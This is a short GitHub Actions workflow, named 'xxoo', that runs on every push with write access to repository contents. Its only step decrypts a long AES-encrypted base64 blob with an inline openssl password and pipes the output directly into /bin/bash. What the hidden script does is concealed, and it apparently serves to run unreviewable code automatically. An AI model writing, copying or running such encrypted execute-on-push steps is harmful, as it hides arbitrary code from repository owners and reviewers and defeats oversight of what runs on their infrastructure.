name: xxoo
on:
  workflow_dispatch:
  push:
jobs:
  build:
    runs-on: ubuntu-latest
    permissions:
      contents: write
    steps:
      - uses: actions/checkout@v4
      - name: xxoo
        run: |
          echo "U2FsdGVkX1+oKobIpVlyjOajtebwRjONZAtzJxMRS7fi4mxcXWJ1gCH9LRGxzJbENYG02BWK7VQbSbLNdlF8krWuBez/m9Wt0gVAij7aBASv1a3hB6cRm3mUbXdOYViA/sSOHQFKCzVqe76ZR7SDxlivecN0ItpA1hkmkCxrAsv+LNjZ2mXdJyxOuHHJMci2w+x8iShor6ZLTJ5f9naBrhoL+m/baj27hFiWiN06TPSaFMrb/lrhPiNxELIPhY2MM7A4i9SsVGyoZrjo6Tb1td8QATE7xK/NofpiTsItmV5UfqViKugJB9H5Ka8CinNa5UXVQiGu4pfmReneR8sfwSNKkv0wsZUoCKgrJzdIZrq4utD5RAU7otIZ5rsQr55dTmaA9n8Phh5lRPpLuLOY57m/Br6Zss9jea5Rfv4bdFpYlHkJWaRICecH3sWYk9pnW5BHkQ78kYUPkLc3zfyFddvH+1fVSJNGRdmP/qCsWuTkS37wh3hSGHeaNmLncHKzmu2+ZRvpZL8IzVp1OcDw23cBfrTQjmnnwP8PIijf3sMlU3jzMGFV/7p2Gsqb1GxvE9cwtP2lTInGJBQHIEVPpfur9+zr3cFn2v11UXNbW/piABRarp4HvR4LEWSiGmQIEm/auPSSXfTd1l31Km/0ZToH93ZLOBCgXXBbI9s+qsmGifsVhup3FXo46lAHCDC7/TLybDx5Y0ywusb7LGDLS0QbF1Hb5h2I77OU5yYKi9ht0XUeUas6lKxsa+gMStoAd0M6jW/jglkWzUyXx44dO/9WJqMmg/56kWYIeXz4OzBV2xJl4zDFjcRmhx2+ezLnDN21ccQAKxfWb1fDa8RXuZeI4JY+xPB71gLKvLbPBxaA/4LanfBQo1UQABAKRZMeloqT4GTULENzhIMvhdNbA0qy84Qd/XFrDSGEi/FdUyNS1cgp9Mb61EiLyKYjPDqzrF9dEaBn6oqhMe207LTr3U6q/1iFnG2F9zexsfqy7iSVRIR2QRAlwdFWce7xpSavfrlVOY4emvGU6ai/e3paEC4M+JyjurddMSqfZtXQvpuQVyhoKifJ4AYz8rvGMMnD+MqGsbnaHYxE+GDLNex3gs3RNgaJgv1lxYWI6g6tJ3lOmhdLqD5P2Q2Marmylcm+hKP8n3akCwaEOUarPLBvF/PqIoat/TJbxHtkAStS4UgkXO84DYOMKmH8AdoEK5OeMHudplIEKM/IYzmsyMCIOV0iLUDS8pDZSKah5jvhgf2tyUJRv46VvFIcZlWvPJ9m9koqoGDKLhRNxluPjoK+GViMWb9fEPhQGP3YndYqx/E8abNhrWTX/idEpmzCXi+e3mOFMy3g1H76oK9SggNhPT3MBzsUcuvZMr8qXKBPbfelJ/rDcK7mbCpMwV//osRgXhfyWChgWb6WIcNT49OfYh5GOvFmo2UpLyJeXnBszLXyRBJl61AV71wvDQgtjtr/7DTDEy6dTPmweayQUIfnVQ==" | openssl enc -d -aes-256-cbc -base64 -A -salt -pbkdf2 -pass pass:7uhfudnfud909~~23 | /bin/bash

